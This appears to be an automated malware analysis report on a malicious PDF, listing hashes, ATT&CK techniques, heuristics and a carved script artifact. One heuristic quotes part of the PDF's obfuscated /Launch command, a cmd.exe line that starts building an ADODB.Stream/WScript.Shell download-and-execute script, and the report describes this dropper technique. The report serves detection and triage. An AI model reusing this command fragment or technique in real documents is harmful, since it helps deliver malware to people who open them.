Malicious PDF — malware analysis report

Static analysis result for SHA-256 a15e7ca6fc4b40c4…

Verdict: MALICIOUS
File type: PDF
Size: 106.9 KB
MD5: 235d58ef48049a76f6e97aa45aeca907
SHA-1: 733b0ed198193a51e5098a9d37ced17436d695b6
SHA-256: a15e7ca6fc4b40c414e30f527af4d45fe98503c5b377309f411e35c042b2a0fc
Risk Score: 194

Malware Insights

MITRE ATT&CK
  • T1204.002 Malicious File
  • T1059.003 Windows Command Shell

A critical-severity heuristic fired on a /Launch action targeting cmd.exe, indicating an attempt to execute commands when the document is opened. The embedded script payload carved from a PDF stream supports this, and the reconstructed command line shows it attempting to use Adodb.Stream, Wscript.Shell, and scripting.filesystemobject. Together these indicate the PDF is designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9904

Heuristics (4)

  • Launch action (critical, PDF_LAUNCH)
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe (critical, PDF_LAUNCH_COMMAND)
    PDF /Launch action specifies an executable target with parameters '/c echo m=".":n="paper.pdf" :y="c:\\windows\\system32\\ActiveX.exe":Set t=CreateObject("Adodb"+m+"Stream"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • Embedded script payload in PDF stream (high, PDF_EMBEDDED_SCRIPT_PAYLOAD)
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Object number defined twice with different bodies (info, PDF_DUPLICATE_OBJ_BODY_INCREMENTAL)
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_script_000002da.bin
SHA-256:  8be50be357734796ce9d8d39c3437b21d0885c48f9df8d574608f3cb759ec778
Kind:     pdf-embedded-script
Source:   PDF decompressed stream script payload at offset 0x2DA
Size:     130 bytes